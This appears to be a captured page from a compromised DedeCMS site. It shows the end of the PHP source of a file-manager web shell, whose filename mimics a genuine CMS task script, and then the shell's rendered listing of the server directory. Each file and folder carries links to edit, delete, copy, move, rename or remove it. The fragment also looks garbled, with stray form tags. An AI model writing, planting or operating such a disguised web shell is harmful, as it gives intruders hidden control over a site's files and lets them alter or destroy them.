echo "<td><a href = ".$current . "&mode=copy&src=".$file.">Copy</a></td>\n";
echo "<td><a href = ".$current . "&mode=move&src=".$file.">Move</a></td>\n";
echo "<td><a href = ".$current . "&mode=rename&old=".$file.">Remame</a></td></tr>\n";
}
else {
$items = scandir ($file);
$items_num = count ($items) - 2;
echo "<tr><td>".$file."</td>";
echo "<td>".$items_num." Items</td>";
echo "<td><a href = ".$current . "/" . $file.">Change directory</a></td>\n";
echo "<td><a href = ".$current . "&mode=rmdir&rm=".$file.">Remove directory</a></td>\n";
echo "<td><a href = ".$current . "&mode=rename&old=".$file.">Rename directory</a></td></tr>\n";
}
}
echo "</table>\n";
?><textarea><br>
<input type = 'submit' value = 'Edit'></form>
<pre>

</pre><table width = 100%>
<tr><td>.</td><td>3 Items</td><td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task/.>Change directory</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rmdir&rm=.>Remove directory</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rename&old=.>Rename directory</a></td></tr>
<tr><td>..</td><td>40 Items</td><td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task/..>Change directory</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rmdir&rm=..>Remove directory</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rename&old=..>Rename directory</a></td></tr>
<tr><td>dede-maketimehtml.php</td><td>0.23 KB</td><td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=edit&file=dede-maketimehtml.php>Edit</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=delete&file=dede-maketimehtml.php>Delete</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=copy&src=dede-maketimehtml.php>Copy</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=move&src=dede-maketimehtml.php>Move</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rename&old=dede-maketimehtml.php>Remame</a></td></tr>
<tr><td>dede-maketimehtmls.php</td><td>6.58 KB</td><td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=edit&file=dede-maketimehtmls.php>Edit</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=delete&file=dede-maketimehtmls.php>Delete</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=copy&src=dede-maketimehtmls.php>Copy</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=move&src=dede-maketimehtmls.php>Move</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rename&old=dede-maketimehtmls.php>Remame</a></td></tr>
<tr><td>dede-optimize-table.php</td><td>0.24 KB</td><td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=edit&file=dede-optimize-table.php>Edit</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=delete&file=dede-optimize-table.php>Delete</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=copy&src=dede-optimize-table.php>Copy</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=move&src=dede-optimize-table.php>Move</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rename&old=dede-optimize-table.php>Remame</a></td></tr>
</table>